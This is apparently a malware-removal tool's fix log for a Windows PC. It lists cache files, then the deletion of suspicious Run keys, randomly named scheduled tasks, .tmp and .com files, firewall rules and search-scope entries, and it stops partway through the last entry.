C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\d35a05a1a95dfc4770164caa7802fa96f9df198c.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000017008 ____A [BBA3C71A1FCC039D161CD9362361786B] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\d36f6f2a0f60b942662fd2021e73314801af3322.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000028512 ____A [E031C3E3D0FBDE3F239DDEE96A2C5B31] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\d51319dc0adec77467f2e503977f82f640a1f189.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000004524 ____A [2BE01441BB58DB91BCCEE05245EFF464] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\d5dff33ce9ba5fc3c56c1bff708230338669ff98.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000028552 ____A [3E9228726A6C9D6D5FDF70D2D56CAA54] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\da15507144290f96413e0e3dbcb1ad1bb354cf79.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000003936 ____A [BBB19DE76A1579DA11E1C87580881310] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\da4ce2a26636eade7a2c708ea296720a718028ff.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000005792 ____A [15049C700376F2D150E1FB1FB9DB50C3] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\dc223a49c99363e3e6c031586f678de3095b962c.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000002648 ____A [A261746307D5CFDFBBDFF3E784D23861] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\dd41a55d4492d05b9d8cbf3fb927b275279ead3c.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000026732 ____A [86958EAC584F854C7007064FDA9815B9] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\df7458f42fe95954b4294636439108991c8d86b0.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000002056 ____A [30C50B26099D4E2556BB0DD42816463F] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\e2561b74facf7726c84c1ff8481261bd9c682493.jsc 2022-03-22 10:40 - 2022-03-22 10:40 - 000029712 ____A [5AB576937D163B7A1237AD9C4024FC04] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\e4afe071288ff3bab828844d371e7fcecda80e40.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000026552 ____A [3F717835D69DB36ED307056DFFFA3E6B] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\e7bf469fe2efa8374e151a508060844419172148.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000004700 ____A [76121082A4D4846DD3842ECE71E49876] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\e7fddf7cc3760d1d010f0755f329a6b96fa98a25.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000006704 ____A [1E3EF35EA59A035B6397F4746185D341] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\e82918e943ade82dcd7e27e3605b011d01198c0b.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000003916 ____A [C8B5A06E3E8ADD4D5C84C469255436BF] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\ea7341485efe29c836c7059b5069b19ccf09f3a7.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000041544 ____A [06834BBCEF77996D9823BD4B1FB4101C] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\eb9b3f56c3ab2cb191a321df136485895121ea49.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000029080 ____A [80BB287E8F0DAC3DCC6925AEF21F3CAC] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\ece054897e5f1cae0101d02691e017fc6e4c362e.qmlc 2022-03-22 11:23 - 2022-03-22 11:23 - 000034104 ____A [017E03B9F1B548731D1D3BCFD1B84942] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\f34c177eab636e6eb6ec4cfa11df101767d0021b.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000020324 ____A [9272662BB01A6C7476FB13FBD9112252] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\f4ec6bb91f996a0634c8eb4280d2e35af160b1cd.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000011544 ____A [8300857124EE538B8C8FC85F3734F52A] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\f9404c2914fd59b18429a4b179f44156ba6cab23.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000020856 ____A [0AD37BB7A5A3FCF24B5CD30F8C2DDF49] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\f9f15d182c4295e5f3e1e7f821ff4555bd75f3d9.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000111344 ____A [F5A4DED546084DE07B3376253CE761C9] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fb4b82088c76212e6a8fffbbf18d1f1f5a5bde67.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000035232 ____A [DACCA05BAD203F2B25EC4CAF3CDF1C1A] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fbb670c1c94485df9b83374c682d842b1b7773c5.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000021972 ____A [3B645B5DA5CA146D1DF7206B8DF83441] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fbfd8d2e1df4808d5a834b7f3d6d86d7e367ef0c.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000016712 ____A [BDC14CF4D72F70A2744C4CBD44C6DEAF] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fd519f9eff3982301705060db0d43e7131c90bf3.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000017140 ____A [7A098F353F3B8D04D2AA430F3AED0401] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fd6ce493ed2514bc7eb7393d4c5ee3cf47497fe9.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000025348 ____A [CBE2B283DF8AB80A726E7772C0787469] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fd94d470dcade3fec14c1b36011fa18196de6ce3.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000005424 ____A [E8F4FA2C61582388751A004DFDC381BB] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\ffddc46fa9e0919296460fcdc5c17b92aaec954b.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000005864 ____A [4D5CC9DE3478C69B569B831690B94898] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\fffa58d88e9e995407c57ba0e1f9295f117be395.qmlc ====== End of Folder: ====== "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\HPUsageTrackingLEDM" => not found "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\MobisynapseSyncHelper" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BYRUA_AGENT" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\DYMOWebApi" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\DLSService" => removed successfully "HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Software\Microsoft\Windows\CurrentVersion\Run\\BYRUA_AGENT" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8}" => removed successfully C:\WINDOWS\System32\Tasks\asdsdasdjikindasddeyu => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\asdsdasdjikindasddeyu" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{27302AB8-5990-4AC3-BEB6-CF5627D88D26}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{27302AB8-5990-4AC3-BEB6-CF5627D88D26}" => removed successfully C:\WINDOWS\System32\Tasks\calendersw => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\calendersw" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{53FC2A34-956B-4691-8FCB-DA0D66138CBD}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53FC2A34-956B-4691-8FCB-DA0D66138CBD}" => removed successfully C:\WINDOWS\System32\Tasks\asdaddddasdadsddasdeyu => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\asdaddddasdadsddasdeyu" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C897E049-5067-41C4-8F4C-CB5C6B419D54}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C897E049-5067-41C4-8F4C-CB5C6B419D54}" => removed successfully C:\WINDOWS\System32\Tasks\microWord => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\microWord" => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => removed successfully C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp => moved successfully "C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu" => not found C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp => moved successfully "C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu" => not found C:\ProgramData\timagar.com => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Local\mbam => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp => moved successfully "C:\WINDOWS\system32\Tasks\microWord" => not found "C:\WINDOWS\system32\Tasks\calendersw" => not found C:\ProgramData\ESETNONU.com => moved successfully C:\ProgramData\milon.com => moved successfully C:\ProgramData\ddond.com => moved successfully "C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp" => not found "C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp" => not found C:\ProgramData\Temp => ":AB1A1E3D" ADS removed successfully "HKU\S-1-5-21-1394640484-365018484-2708498470-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully HKU\S-1-5-21-1394640484-365018484-2708498470-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B18C6A76-7C50-4965-9A1B-B109B920ADCD} => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe" => removed 